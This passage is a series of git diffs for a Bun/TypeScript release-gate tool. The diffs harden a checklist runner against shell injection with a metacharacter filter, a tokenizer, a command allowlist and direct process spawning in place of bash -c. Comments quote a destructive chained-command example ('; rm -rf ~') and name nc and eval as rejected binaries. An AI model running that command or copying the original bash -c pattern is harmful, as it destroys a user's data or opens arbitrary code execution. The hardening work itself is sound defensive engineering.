+    "typescript": ["typescript@5.9.3", "", { "bin": { "tsc": "bin/tsc", "tsserver": "bin/tsserver" } }, "sha512-jl1vZzPDinLr9eUt3J/t7V6FgNEw9QjvBPdysz9KfQDD41fQrC2Y4vKQdiaUpFT4bXlb1RHhLpp8wtm6M5TgSw=="],
+
+    "undici-types": ["undici-types@7.19.2", "", {}, "sha512-qYVnV5OEm2AW8cJMCpdV20CDyaN3g0AjDlOGf1OW4iaDEx8MwdtChUp4zu4H0VP3nDRF/8RKWH+IPp9uW0YGZg=="],
+  }
+}

--- a/package.json
+++ b/package.json
@@ -1,0 +1,16 @@
+{
+  "name": "release-manager",
+  "module": "scripts/check-gate-table.ts",
+  "type": "module",
+  "private": true,
+  "scripts": {
+    "test": "bun test",
+    "typecheck": "bunx tsc --noEmit"
+  },
+  "devDependencies": {
+    "@types/bun": "latest"
+  },
+  "peerDependencies": {
+    "typescript": "^5"
+  }
+}

--- a/scripts/check-gate-table.ts
+++ b/scripts/check-gate-table.ts
@@ -6,16 +6,23 @@
  * and run each gate row's "How To Verify" command via Bash. Emit a structured
  * JSON report.
  *
- * TRUST BOUNDARY (per Echo's review on release-manager#2):
+ * TRUST BOUNDARY (per Echo's review + sweep on release-manager#2):
  *   The verify cells in `release-checklist.md` are operator-editable markdown.
  *   Today compass is internal but the file is still treated as untrusted code
  *   here — anyone who can open a PR against compass would otherwise be able
  *   to run arbitrary shell on the release operator's machine. We mitigate via:
- *     1. Allowlist regex in VERIFY_COMMAND_ALLOWLIST — verify cells whose
- *        command does NOT match are recorded as `fail` with a clear reason
- *        rather than executed.
- *     2. 30-second timeout on each spawnSync.
- *     3. Empty-rows / unparseable-table = fail-closed (NOT fail-open).
+ *     1. Shell-metacharacter rejection (SHELL_METACHARACTER_RE) — any cell
+ *        containing `;`, `&`, `|`, `$`, backtick, `>`, `<`, newline, `(`,
+ *        `)`, or `\` fails closed before tokenization.
+ *     2. Deliberate tokenizer (tokenizeVerifyCommand) — no shell-quote dep,
+ *        no shell expansion, just whitespace + single/double quoted strings.
+ *     3. Direct spawnSync(program, args) — NEVER `bash -c`. The shell is
+ *        never invoked, so chained / redirected / substituted commands
+ *        cannot be interpreted even if a metacharacter slipped past step 1.
+ *     4. Allowlist regex in VERIFY_COMMAND_ALLOWLIST — defense in depth on
+ *        the first token (rejects unknown binaries like `eval`, `nc`).
+ *     5. 30-second timeout on each spawnSync.
+ *     6. Empty-rows / unparseable-table = fail-closed (NOT fail-open).
  *   See skill/Workflows/TrustGateCheck.md for the documented contract.
  *
  * Usage:
@@ -105,12 +112,95 @@ export interface CheckGateReport {
  * Add new prefixes here only after the new command shape is reviewed in the
  * `release-checklist.md` PR — never widen the allowlist to make a single cell
  * pass.
+ *
+ * NOTE: this regex is now an *additional* gate, not the primary defense.
+ * Echo's sweep follow-up on release-manager#2 (2026-04-26): the original
+ * implementation handed the unwrapped command string to `bash -c`, which
+ * happily executed anything an attacker appended after an allowlisted
+ * prefix (e.g. `gh issue view 22 ; rm -rf ~` matched `^gh\s` and bash ran
+ * both halves). The fix below routes verify cells through a
+ * shell-metacharacter rejection step + a deliberate tokenizer + direct
+ * `spawnSync(prog, args)` — no shell at all. The allowlist remains as
+ * belt-and-braces.
  */
 export const VERIFY_COMMAND_ALLOWLIST =
   /^(gh\s|git\s|bun\s|bunx\s|test\s|\[\s|!\s|find\s|grep\s|cat\s|wc\s|stat\s|ls\s|echo\s|curl\s|true|false)/;
 
 export function isVerifyCommandAllowed(command: string): boolean {
   return VERIFY_COMMAND_ALLOWLIST.test(command.trim());
+}
+
+/**
+ * Defense in depth (Echo sweep on release-manager#2): refuse cells whose
+ * unwrapped command contains any character that bash would interpret as
+ * control flow, redirection, expansion, or command substitution. We never
+ * reach a shell at runtime, but rejecting these characters up-front means
+ * the operator gets a clear "shell metacharacters" failure and the bug is
+ * impossible to reintroduce by accident if a future maintainer brings back
+ * `bash -c`.
+ *
+ * Rejected: `;` `&` `|` `$` `` ` `` `>` `<` newline `(` `)` `\` (also `\r`).
+ * `(`/`)` are rejected because bash uses them for subshells and process
+ * substitution; verify cells have never legitimately needed them.
+ */
+export const SHELL_METACHARACTER_RE = /[;&|$`><\n\r()\\]/;
+
+export function containsShellMetacharacters(command: string): boolean {
+  return SHELL_METACHARACTER_RE.test(command);
+}
+
+/**
+ * Tokenize a verify-cell command into program + args without invoking any
+ * shell. Supports unquoted whitespace-separated tokens and single- or
+ * double-quoted strings (no escapes inside quotes — verify cells don't need
+ * them, and rejecting `\` at the metacharacter step means we never see one
+ * here anyway). Throws on anything it can't deterministically tokenize so
+ * the caller can record a structured fail.
+ *
+ * This is a deliberate purpose-built tokenizer rather than a shell-parsing
+ * library: the input grammar is small (release-checklist verify cells), the
+ * threat model is "operator-editable markdown is untrusted", and we want
+ * the tokenizer to refuse weird inputs by construction.
+ */
+export function tokenizeVerifyCommand(command: string): string[] {
+  const tokens: string[] = [];
+  let i = 0;
+  const n = command.length;
+  while (i < n) {
+    const c = command[i];
+    if (c === " " || c === "\t") {
+      i++;
+      continue;
+    }
+    if (c === "'" || c === '"') {
+      const quote = c;
+      i++;
+      let buf = "";
+      while (i < n && command[i] !== quote) {
+        buf += command[i];
+        i++;
+      }
+      if (i >= n) {
+        throw new Error(`unterminated ${quote === "'" ? "single" : "double"} quote`);
+      }
+      i++; // consume closing quote
+      tokens.push(buf);
+      continue;
+    }
+    // Unquoted token — read up to next whitespace. Metacharacters are
+    // already rejected by containsShellMetacharacters() before we get here.
+    let buf = "";
+    while (i < n && command[i] !== " " && command[i] !== "\t") {
+      const ch = command[i];
+      if (ch === "'" || ch === '"') {
+        throw new Error("unexpected quote inside unquoted token");
+      }
+      buf += ch;
+      i++;
+    }
+    if (buf.length > 0) tokens.push(buf);
+  }
+  return tokens;
 }
 
 export function defaultChecklistPath(): string {
@@ -193,8 +283,36 @@ export function runGateRow(row: GateRow, opts: RunGateOptions = {}): GateResult 
   const command = unwrapBacktickCommand(row.verify);
   // Per Echo's review on release-manager#2 — verify cells originate in compass
   // markdown which is internal but operator-editable; we treat them as
-  // untrusted. Any command not matching VERIFY_COMMAND_ALLOWLIST is rejected
-  // here rather than being passed to bash -c.
+  // untrusted. The trust gate applies three layers in order:
+  //
+  //   1. Reject any cell containing shell metacharacters (`;`, `&`, `|`,
+  //      `$`, backtick, `>`, `<`, newline, `(`, `)`, `\`). Echo's sweep
+  //      follow-up (2026-04-26) caught a chaining bug where the original
+  //      prefix-only allowlist accepted `gh issue view 22 ; rm -rf ~` and
+  //      then `bash -c` ran both halves. Rejecting these characters first
+  //      makes that vector impossible regardless of how the rest of the
+  //      pipeline evolves.
+  //
+  //   2. Tokenize the command without a shell.
+  //
+  //   3. Match the first token against VERIFY_COMMAND_ALLOWLIST as a
+  //      defense-in-depth gate (now redundant with step 1+2 for shell
+  //      injection, but still useful to keep `nc`, `eval`, `python` etc.
+  //      out of verify cells).
+  //
+  // We then run the resolved program directly via spawnSync(prog, args) —
+  // never `bash -c` — so even if a metacharacter slipped through somehow
+  // it would be passed as a literal arg to the program, not interpreted.
+  if (containsShellMetacharacters(command)) {
+    return {
+      ...row,
+      status: "fail",
+      output:
+        "verify cell contains shell metacharacters — manual review required " +
+        "(operator-editable markdown is untrusted; see SHELL_METACHARACTER_RE " +
+        "in scripts/check-gate-table.ts)",
+    };
+  }
   if (!isVerifyCommandAllowed(command)) {
     return {
       ...row,
@@ -204,7 +322,26 @@ export function runGateRow(row: GateRow, opts: RunGateOptions = {}): GateResult 
         "(see VERIFY_COMMAND_ALLOWLIST in scripts/check-gate-table.ts)",
     };
   }
-  const result = spawnSync("bash", ["-c", command], {
+  let tokens: string[];
+  try {
+    tokens = tokenizeVerifyCommand(command);
+  } catch (err) {
+    return {
+      ...row,
+      status: "fail",
+      output: `verify cell could not be tokenized: ${(err as Error).message}`,
+    };
+  }
+  const program = tokens[0];
+  if (!program) {
+    return {
+      ...row,
+      status: "fail",
+      output: "verify cell tokenized to zero tokens",
+    };
+  }
+  const args = tokens.slice(1);
+  const result = spawnSync(program, args, {
     encoding: "utf8",
     timeout: opts.timeoutMs ?? 30_000,
   });

--- a/scripts/check-gate-table.ts
+++ b/scripts/check-gate-table.ts
@@ -1,0 +1,257 @@
+#!/usr/bin/env bun
+/**
+ * check-gate-table.ts
+ *
+ * Parse the trust-gate table in `compass/sops/release-checklist.md` (Phase 0)
+ * and run each gate row's "How To Verify" command via Bash. Emit a structured
+ * JSON report.
+ *
+ * Usage:
+ *   bun scripts/check-gate-table.ts [--milestone <S2-22|S2-30|S2-32|external-onramp>] [--dry-run] [--checklist <path>]
+ *
+ * Flags:
+ *   --milestone   Selects which gate to run. Mapping:
+ *                   S2-22         -> Gate 1 ("Every Package Verified")
+ *                   S2-32         -> Gate 2 ("Every Publisher Known")
+ *                   S2-30         -> Gate 3 ("Trust Story First")
+ *                   external-onramp -> Gate 4 ("Dogfood the Pipeline")
+ *                 Omit to walk all four (rare; usually one applies per release).
+ *   --dry-run     Parse the table and emit the rows without executing the verify commands.
+ *   --checklist   Override path to release-checklist.md (default: ~/Developer/compass/sops/release-checklist.md).
+ *
+ * Output:
+ *   JSON {
+ *     gates: [{ id, gateNumber, gateLabel, milestone, name, verify, status, output? }],
+ *     allPassed: bool
+ *   }
+ *
+ * TODO(v0.2): generalize for non-grove repos. Several rows hard-code grove
+ * issue numbers in their verify commands; that's a property of the SOP, not
+ * this script. When v0.2 ships per-repo gate tables, this script will read
+ * the appropriate one.
+ */
+
+import { spawnSync } from "node:child_process";
+import { existsSync, readFileSync } from "node:fs";
+import { homedir } from "node:os";
+import { resolve } from "node:path";
+
+export type MilestoneKey = "S2-22" | "S2-32" | "S2-30" | "external-onramp";
+
+export const MILESTONE_TO_GATE: Record<MilestoneKey, number> = {
+  "S2-22": 1,
+  "S2-32": 2,
+  "S2-30": 3,
+  "external-onramp": 4,
+};
+
+export const GATE_LABELS: Record<number, string> = {
+  1: "Every Package Verified",
+  2: "Every Publisher Known",
+  3: "Trust Story First",
+  4: "Dogfood the Pipeline",
+};
+
+export const GATE_TO_MILESTONE: Record<number, MilestoneKey> = {
+  1: "S2-22",
+  2: "S2-32",
+  3: "S2-30",
+  4: "external-onramp",
+};
+
+export interface GateRow {
+  id: string;            // e.g. "G1-1"
+  gateNumber: number;    // 1..4
+  gateLabel: string;
+  milestone: MilestoneKey;
+  name: string;          // the "Check" cell
+  verify: string;        // the "How To Verify" cell, raw markdown
+}
+
+export interface GateResult extends GateRow {
+  status: "pass" | "fail" | "skipped";
+  output?: string;
+}
+
+export interface CheckGateReport {
+  gates: GateResult[];
+  allPassed: boolean;
+}
+
+export function defaultChecklistPath(): string {
+  return resolve(homedir(), "Developer", "compass", "sops", "release-checklist.md");
+}
+
+/** Strip a single backtick wrapper if both ends are backticks. */
+function unwrapBacktickCommand(verify: string): string {
+  const trimmed = verify.trim();
+  if (trimmed.startsWith("`") && trimmed.endsWith("`") && trimmed.length >= 2) {
+    return trimmed.slice(1, -1).replace(/\\\|/g, "|").trim();
+  }
+  return trimmed;
+}
+
+/** Detect whether the verify cell is an executable command (starts with `). */
+export function isExecutable(verify: string): boolean {
+  return verify.trim().startsWith("`");
+}
+
+/** Parse the Phase 0 gate tables out of the release-checklist markdown. */
+export function parseGateTable(markdown: string): GateRow[] {
+  const lines = markdown.split("\n");
+  const rows: GateRow[] = [];
+
+  let currentGate: number | undefined;
+  for (let i = 0; i < lines.length; i++) {
+    const line = lines[i] ?? "";
+    const gateHeader = line.match(/^###\s+Gate\s+(\d+):/i);
+    if (gateHeader && gateHeader[1]) {
+      currentGate = Number(gateHeader[1]);
+      continue;
+    }
+    // Phase 1 header ends Phase 0.
+    if (/^##\s+Phase\s+1:/i.test(line)) break;
+
+    if (!currentGate) continue;
+
+    // Match a row: | G1-1 | Check text | Verify text |
+    const rowMatch = line.match(/^\|\s*(G\d+-\d+)\s*\|\s*(.+?)\s*\|\s*(.+?)\s*\|\s*$/);
+    if (!rowMatch) continue;
+    const [, id, name, verify] = rowMatch;
+    if (!id || !name || !verify) continue;
+
+    const milestone = GATE_TO_MILESTONE[currentGate];
+    if (!milestone) continue;
+
+    rows.push({
+      id,
+      gateNumber: currentGate,
+      gateLabel: GATE_LABELS[currentGate] ?? `Gate ${currentGate}`,
+      milestone,
+      name,
+      verify,
+    });
+  }
+  return rows;
+}
+
+export interface RunGateOptions {
+  dryRun?: boolean;
+  timeoutMs?: number;
+}
+
+export function runGateRow(row: GateRow, opts: RunGateOptions = {}): GateResult {
+  if (opts.dryRun) {
+    return { ...row, status: "skipped", output: "dry-run: not executed" };
+  }
+  if (!isExecutable(row.verify)) {
+    return {
+      ...row,
+      status: "skipped",
+      output: "verify cell is not an executable command (manual gate)",
+    };
+  }
+  const command = unwrapBacktickCommand(row.verify);
+  const result = spawnSync("bash", ["-c", command], {
+    encoding: "utf8",
+    timeout: opts.timeoutMs ?? 30_000,
+  });
+  const stdout = (result.stdout ?? "").trim();
+  const stderr = (result.stderr ?? "").trim();
+  const combined = [stdout, stderr].filter((s) => s.length > 0).join("\n---\n");
+  if (result.status === 0) {
+    return { ...row, status: "pass", output: combined };
+  }
+  return { ...row, status: "fail", output: combined };
+}
+
+export interface RunChecklistOptions extends RunGateOptions {
+  milestone?: MilestoneKey;
+}
+
+export function runChecklist(
+  rows: GateRow[],
+  opts: RunChecklistOptions = {},
+): CheckGateReport {
+  const filtered = opts.milestone
+    ? rows.filter((r) => r.milestone === opts.milestone)
+    : rows;
+  const results = filtered.map((row) => runGateRow(row, opts));
+  const allPassed = results.every((r) => r.status === "pass" || r.status === "skipped");
+  return { gates: results, allPassed };
+}
+
+interface ParsedArgs {
+  milestone?: MilestoneKey;
+  dryRun: boolean;
+  checklist: string;
+  help: boolean;
+}
+
+export function parseCliArgs(argv: string[]): ParsedArgs {
+  const out: ParsedArgs = {
+    dryRun: false,
+    checklist: defaultChecklistPath(),
+    help: false,
+  };
+  for (let i = 0; i < argv.length; i++) {
+    const arg = argv[i];
+    if (arg === "--help" || arg === "-h") out.help = true;
+    else if (arg === "--dry-run") out.dryRun = true;
+    else if (arg === "--milestone") {
+      const v = argv[++i];
+      if (v && v in MILESTONE_TO_GATE) out.milestone = v as MilestoneKey;
+      else throw new Error(`unknown milestone: ${v}`);
+    } else if (arg === "--checklist") {
+      const v = argv[++i];
+      if (!v) throw new Error("--checklist requires a path argument");
+      out.checklist = resolve(v);
+    }
+  }
+  return out;
+}
+
+function helpText(): string {
+  return [
+    "Usage: bun scripts/check-gate-table.ts [--milestone <id>] [--dry-run] [--checklist <path>]",
+    "",
+    "Milestones:",
+    "  S2-22            Gate 1 (Every Package Verified)",
+    "  S2-32            Gate 2 (Every Publisher Known)",
+    "  S2-30            Gate 3 (Trust Story First)",
+    "  external-onramp  Gate 4 (Dogfood the Pipeline)",
+  ].join("\n");
+}
+
+function main(): number {
+  let args: ParsedArgs;
+  try {
+    args = parseCliArgs(process.argv.slice(2));
+  } catch (err) {
+    process.stderr.write(`check-gate-table: ${(err as Error).message}\n`);
+    return 2;
+  }
+  if (args.help) {
+    process.stdout.write(helpText() + "\n");
+    return 0;
+  }
+  if (!existsSync(args.checklist)) {
+    process.stderr.write(`check-gate-table: checklist not found: ${args.checklist}\n`);
+    return 1;
+  }
+  const markdown = readFileSync(args.checklist, "utf8");
+  const rows = parseGateTable(markdown);
+  if (rows.length === 0) {
+    process.stderr.write("check-gate-table: parsed 0 rows from gate table\n");
+  }
+  const report = runChecklist(rows, {
+    dryRun: args.dryRun,
+    milestone: args.milestone,
+  });
+  process.stdout.write(JSON.stringify(report, null, 2) + "\n");
+  return report.allPassed ? 0 : 1;
+}
+
+if (import.meta.main) {
+  process.exit(main());
+}

--- a/scripts/check-gate-table.ts
+++ b/scripts/check-gate-table.ts
@@ -6,6 +6,18 @@
  * and run each gate row's "How To Verify" command via Bash. Emit a structured
  * JSON report.
  *
+ * TRUST BOUNDARY (per Echo's review on release-manager#2):
+ *   The verify cells in `release-checklist.md` are operator-editable markdown.
+ *   Today compass is internal but the file is still treated as untrusted code
+ *   here — anyone who can open a PR against compass would otherwise be able
+ *   to run arbitrary shell on the release operator's machine. We mitigate via:
+ *     1. Allowlist regex in VERIFY_COMMAND_ALLOWLIST — verify cells whose
+ *        command does NOT match are recorded as `fail` with a clear reason
+ *        rather than executed.
+ *     2. 30-second timeout on each spawnSync.
+ *     3. Empty-rows / unparseable-table = fail-closed (NOT fail-open).
+ *   See skill/Workflows/TrustGateCheck.md for the documented contract.
+ *
  * Usage:
  *   bun scripts/check-gate-table.ts [--milestone <S2-22|S2-30|S2-32|external-onramp>] [--dry-run] [--checklist <path>]
  *
@@ -22,7 +34,9 @@
  * Output:
  *   JSON {
  *     gates: [{ id, gateNumber, gateLabel, milestone, name, verify, status, output? }],
- *     allPassed: bool
+ *     allPassed: bool,
+ *     reason?: string,           // populated when allPassed=false (or empty rows)
+ *     manualGatesPending: number // count of skipped non-dry-run rows requiring human follow-up
  *   }
  *
  * TODO(v0.2): generalize for non-grove repos. Several rows hard-code grove
@@ -76,6 +90,27 @@ export interface GateResult extends GateRow {
 export interface CheckGateReport {
   gates: GateResult[];
   allPassed: boolean;
+  /** When allPassed=false, a short human-readable reason. Omitted when allPassed=true. */
+  reason?: string;
+  /** Count of skipped rows (non-dry-run) that represent manual gates still requiring human follow-up. */
+  manualGatesPending: number;
+}
+
+/**
+ * Allowlist of command prefixes permitted in verify cells (per Echo's review on
+ * release-manager#2). Verify cells whose unwrapped command does not match this
+ * regex are recorded as `fail` with reason "verify command not in allowlist —
+ * manual review required" rather than being executed.
+ *
+ * Add new prefixes here only after the new command shape is reviewed in the
+ * `release-checklist.md` PR — never widen the allowlist to make a single cell
+ * pass.
+ */
+export const VERIFY_COMMAND_ALLOWLIST =
+  /^(gh\s|git\s|bun\s|bunx\s|test\s|\[\s|!\s|find\s|grep\s|cat\s|wc\s|stat\s|ls\s|echo\s|curl\s|true|false)/;
+
+export function isVerifyCommandAllowed(command: string): boolean {
+  return VERIFY_COMMAND_ALLOWLIST.test(command.trim());
 }
 
 export function defaultChecklistPath(): string {
@@ -109,8 +144,12 @@ export function parseGateTable(markdown: string): GateRow[] {
       currentGate = Number(gateHeader[1]);
       continue;
     }
-    // Phase 1 header ends Phase 0.
-    if (/^##\s+Phase\s+1:/i.test(line)) break;
+    // Phase 0 ends at the next H2 header — but only after we've seen at least
+    // one gate row, so leading H2s before Phase 0 (e.g. "## Overview") don't
+    // terminate the scan early. Per Echo's review on release-manager#2:
+    // structurally the contract is "Phase 0 ends at the next H2", not "ends
+    // at Phase 1 specifically" — the latter silently swallows reorgs.
+    if (rows.length > 0 && /^##\s/.test(line) && !/^###/.test(line)) break;
 
     if (!currentGate) continue;
 
@@ -152,6 +191,19 @@ export function runGateRow(row: GateRow, opts: RunGateOptions = {}): GateResult 
     };
   }
   const command = unwrapBacktickCommand(row.verify);
+  // Per Echo's review on release-manager#2 — verify cells originate in compass
+  // markdown which is internal but operator-editable; we treat them as
+  // untrusted. Any command not matching VERIFY_COMMAND_ALLOWLIST is rejected
+  // here rather than being passed to bash -c.
+  if (!isVerifyCommandAllowed(command)) {
+    return {
+      ...row,
+      status: "fail",
+      output:
+        "verify command not in allowlist — manual review required " +
+        "(see VERIFY_COMMAND_ALLOWLIST in scripts/check-gate-table.ts)",
+    };
+  }
   const result = spawnSync("bash", ["-c", command], {
     encoding: "utf8",
     timeout: opts.timeoutMs ?? 30_000,
@@ -176,9 +228,74 @@ export function runChecklist(
   const filtered = opts.milestone
     ? rows.filter((r) => r.milestone === opts.milestone)
     : rows;
+
+  // FAIL-CLOSED on empty rows. Per Echo's review on release-manager#2: the
+  // single most important rule of the trust gate is "halt on first fail" —
+  // and an unparseable / missing / restructured table must be the loudest
+  // possible failure, never a silent green light. The OLD code returned
+  // allPassed=true here because `[].every(...)` returns true; that was the
+  // blocker.
+  if (filtered.length === 0) {
+    const milestoneSuffix = opts.milestone ? ` for milestone ${opts.milestone}` : "";
+    return {
+      gates: [],
+      allPassed: false,
+      reason:
+        "no gates parsed — milestone table missing or table format unrecognized" +
+        milestoneSuffix,
+      manualGatesPending: 0,
+    };
+  }
+
   const results = filtered.map((row) => runGateRow(row, opts));
-  const allPassed = results.every((r) => r.status === "pass" || r.status === "skipped");
-  return { gates: results, allPassed };
+
+  // Distinguish three states (per Echo's review on release-manager#2):
+  //   - allPassed=true requires ≥1 executed pass AND zero fails.
+  //   - skipped rows do NOT count toward green; they surface as
+  //     manualGatesPending so the workflow consumer knows a human gate is
+  //     still owed.
+  //   - In dry-run mode every row is "skipped" by design, so don't classify
+  //     dry-run skips as pending manual work.
+  const passes = results.filter((r) => r.status === "pass").length;
+  const fails = results.filter((r) => r.status === "fail").length;
+  const skipped = results.filter((r) => r.status === "skipped").length;
+  const manualGatesPending = opts.dryRun ? 0 : skipped;
+
+  if (opts.dryRun) {
+    // Dry-run is informational; don't flip allPassed off just because nothing
+    // ran. Operator knows --dry-run means "parse and inspect", not "verify".
+    return {
+      gates: results,
+      allPassed: true,
+      manualGatesPending,
+    };
+  }
+
+  if (fails > 0) {
+    return {
+      gates: results,
+      allPassed: false,
+      reason: `${fails} gate row(s) failed — see gates[].status='fail'`,
+      manualGatesPending,
+    };
+  }
+
+  if (passes === 0) {
+    return {
+      gates: results,
+      allPassed: false,
+      reason:
+        `no executed passes — ${skipped} skipped (manual) row(s) require ` +
+        `human follow-up before allPassed can be true`,
+      manualGatesPending,
+    };
+  }
+
+  return {
+    gates: results,
+    allPassed: true,
+    manualGatesPending,
+  };
 }
 
 interface ParsedArgs {
@@ -249,6 +366,9 @@ function main(): number {
     milestone: args.milestone,
   });
   process.stdout.write(JSON.stringify(report, null, 2) + "\n");
+  if (!report.allPassed && report.reason) {
+    process.stderr.write(`check-gate-table: ${report.reason}\n`);
+  }
   return report.allPassed ? 0 : 1;
 }
 

--- a/scripts/list-releases-since-tag.ts
+++ b/scripts/list-releases-since-tag.ts
@@ -1,0 +1,192 @@
+#!/usr/bin/env bun
+/**
+ * list-releases-since-tag.ts
+ *
+ * Enumerate commits + merged PRs in a repo since a given tag.
+ *
+ * Usage:
+ *   bun scripts/list-releases-since-tag.ts <repo-path> <tag> [--json]
+ *
+ * Defaults:
+ *   <repo-path> -> $MF_TARGET_REPO or ~/Developer/grove
+ *
+ * Output:
+ *   JSON {
+ *     repo: <abs-path>,
+ *     since: <tag>,
+ *     commits: [{ sha, subject, prNumber? }],
+ *     prs:     [{ number, title, mergedAt, labels: string[] }]
+ *   }
+ *
+ * TODO(v0.2): generalize for non-grove repos. Today the GH search uses
+ * `gh pr list` against whatever remote `origin` resolves to, which works for
+ * any repo with a configured `origin`, but downstream workflows still hard-code
+ * `the-metafactory/grove` for `gh release create` etc. Drop those when we
+ * generalise the bundle in v0.2.
+ */
+
+import { spawnSync } from "node:child_process";
+import { existsSync } from "node:fs";
+import { homedir } from "node:os";
+import { resolve } from "node:path";
+
+export interface CommitEntry {
+  sha: string;
+  subject: string;
+  prNumber?: number;
+}
+
+export interface PrEntry {
+  number: number;
+  title: string;
+  mergedAt: string;
+  labels: string[];
+}
+
+export interface ListReleasesResult {
+  repo: string;
+  since: string;
+  commits: CommitEntry[];
+  prs: PrEntry[];
+}
+
+export function defaultRepoPath(): string {
+  const env = process.env["MF_TARGET_REPO"];
+  if (env && env.length > 0) return env;
+  return resolve(homedir(), "Developer", "grove");
+}
+
+/** Parse `git log --oneline TAG..HEAD` output into commit entries. */
+export function parseGitLogOneline(output: string): CommitEntry[] {
+  const lines = output.split("\n").filter((l) => l.trim().length > 0);
+  return lines.map((line) => {
+    const space = line.indexOf(" ");
+    if (space < 0) {
+      return { sha: line.trim(), subject: "" };
+    }
+    const sha = line.slice(0, space);
+    const subject = line.slice(space + 1).trim();
+    const prMatch = subject.match(/\(#(\d+)\)\s*$/);
+    const entry: CommitEntry = { sha, subject };
+    if (prMatch && prMatch[1]) entry.prNumber = Number(prMatch[1]);
+    return entry;
+  });
+}
+
+/** Parse `gh pr list --json number,title,mergedAt,labels` JSON output. */
+export function parseGhPrList(jsonText: string): PrEntry[] {
+  const raw = JSON.parse(jsonText) as Array<{
+    number: number;
+    title: string;
+    mergedAt: string;
+    labels?: Array<{ name: string }>;
+  }>;
+  return raw.map((row) => ({
+    number: row.number,
+    title: row.title,
+    mergedAt: row.mergedAt,
+    labels: (row.labels ?? []).map((l) => l.name),
+  }));
+}
+
+/** Resolve the merge date of a tag — used to scope the gh pr list search. */
+export function tagDate(repoPath: string, tag: string): string | undefined {
+  const result = spawnSync("git", ["log", "-1", "--format=%cI", tag], {
+    cwd: repoPath,
+    encoding: "utf8",
+  });
+  if (result.status !== 0) return undefined;
+  const stdout = result.stdout?.trim();
+  if (!stdout || stdout.length === 0) return undefined;
+  return stdout;
+}
+
+export function listReleasesSinceTag(
+  repoPath: string,
+  tag: string,
+): ListReleasesResult {
+  if (!existsSync(repoPath)) {
+    throw new Error(`repo path does not exist: ${repoPath}`);
+  }
+
+  const logResult = spawnSync(
+    "git",
+    ["log", "--oneline", `${tag}..HEAD`],
+    { cwd: repoPath, encoding: "utf8" },
+  );
+  if (logResult.status !== 0) {
+    const stderr = logResult.stderr?.trim() ?? "";
+    throw new Error(`git log failed: ${stderr || "unknown error"}`);
+  }
+  const commits = parseGitLogOneline(logResult.stdout ?? "");
+
+  const since = tagDate(repoPath, tag);
+  let prs: PrEntry[] = [];
+  if (since) {
+    const search = `merged:>${since}`;
+    const ghResult = spawnSync(
+      "gh",
+      [
+        "pr",
+        "list",
+        "--state",
+        "merged",
+        "--search",
+        search,
+        "--limit",
+        "200",
+        "--json",
+        "number,title,mergedAt,labels",
+      ],
+      { cwd: repoPath, encoding: "utf8" },
+    );
+    if (ghResult.status === 0 && ghResult.stdout) {
+      try {
+        prs = parseGhPrList(ghResult.stdout);
+      } catch (err) {
+        process.stderr.write(
+          `list-releases-since-tag: failed to parse gh output (${(err as Error).message})\n`,
+        );
+      }
+    } else if (ghResult.status !== 0) {
+      // Don't hard-fail — gh may not be configured in test environments.
+      process.stderr.write(
+        `list-releases-since-tag: gh pr list failed (status=${ghResult.status}); continuing with empty PR list\n`,
+      );
+    }
+  }
+
+  return { repo: repoPath, since: tag, commits, prs };
+}
+
+function main(): number {
+  const args = process.argv.slice(2);
+  if (args.includes("--help") || args.includes("-h")) {
+    process.stdout.write(
+      "Usage: bun scripts/list-releases-since-tag.ts <repo-path> <tag>\n",
+    );
+    return 0;
+  }
+  const repoPath = args[0] && !args[0].startsWith("--")
+    ? resolve(args[0])
+    : defaultRepoPath();
+  const tag = args[1];
+  if (!tag) {
+    process.stderr.write(
+      "list-releases-since-tag: missing <tag> argument\n",
+    );
+    return 2;
+  }
+  try {
+    const result = listReleasesSinceTag(repoPath, tag);
+    process.stdout.write(JSON.stringify(result, null, 2) + "\n");
+    return 0;
+  } catch (err) {
+    process.stderr.write(`list-releases-since-tag: ${(err as Error).message}\n`);
+    return 1;
+  }
+}
+
+if (import.meta.main) {
+  process.exit(main());
+}

--- a/scripts/list-releases-since-tag.ts
+++ b/scripts/list-releases-since-tag.ts
@@ -56,6 +56,18 @@ export function defaultRepoPath(): string {
   return resolve(homedir(), "Developer", "grove");
 }
 
+/**
+ * Whether to allow `gh` failures to silently produce an empty PR list, instead
+ * of throwing. Default OFF (per Echo's review on release-manager#2) — release
+ * tooling must not fail open. Tests that want to exercise the legacy
+ * permissive behavior set MF_ALLOW_GH_FAILURE=1 explicitly.
+ */
+export function shouldAllowGhFailure(
+  env: NodeJS.ProcessEnv = process.env,
+): boolean {
+  return env["MF_ALLOW_GH_FAILURE"] === "1";
+}
+
 /** Parse `git log --oneline TAG..HEAD` output into commit entries. */
 export function parseGitLogOneline(output: string): CommitEntry[] {
   const lines = output.split("\n").filter((l) => l.trim().length > 0);
@@ -144,15 +156,34 @@ export function listReleasesSinceTag(
       try {
         prs = parseGhPrList(ghResult.stdout);
       } catch (err) {
-        process.stderr.write(
-          `list-releases-since-tag: failed to parse gh output (${(err as Error).message})\n`,
-        );
+        // Per Echo's review on release-manager#2: a parse failure means the
+        // changelog would silently lose merged PRs. That's a release-critical
+        // failure-open path. Propagate by default; the env opt-in keeps the
+        // permissive behavior available for test environments.
+        const message = `list-releases-since-tag: failed to parse gh output (${(err as Error).message})`;
+        if (shouldAllowGhFailure()) {
+          process.stderr.write(`${message} — continuing because MF_ALLOW_GH_FAILURE=1\n`);
+        } else {
+          throw new Error(`${message} (set MF_ALLOW_GH_FAILURE=1 to suppress)`);
+        }
       }
     } else if (ghResult.status !== 0) {
-      // Don't hard-fail — gh may not be configured in test environments.
-      process.stderr.write(
-        `list-releases-since-tag: gh pr list failed (status=${ghResult.status}); continuing with empty PR list\n`,
-      );
+      // Per Echo's review on release-manager#2: silently producing an empty
+      // PR list when `gh` fails means release notes can lose every PR without
+      // the operator noticing. Propagate by default; gate the legacy
+      // permissive behavior behind MF_ALLOW_GH_FAILURE=1 for test environments
+      // that intentionally don't have gh configured.
+      const stderr = (ghResult.stderr ?? "").trim();
+      const message =
+        `list-releases-since-tag: gh pr list failed (status=${ghResult.status})` +
+        (stderr ? `: ${stderr}` : "");
+      if (shouldAllowGhFailure()) {
+        process.stderr.write(
+          `${message}; continuing with empty PR list because MF_ALLOW_GH_FAILURE=1\n`,
+        );
+      } else {
+        throw new Error(`${message} (set MF_ALLOW_GH_FAILURE=1 to suppress)`);
+      }
     }
   }
 

--- a/scripts/prepare-changelog.ts
+++ b/scripts/prepare-changelog.ts
@@ -1,0 +1,206 @@
+#!/usr/bin/env bun
+/**
+ * prepare-changelog.ts
+ *
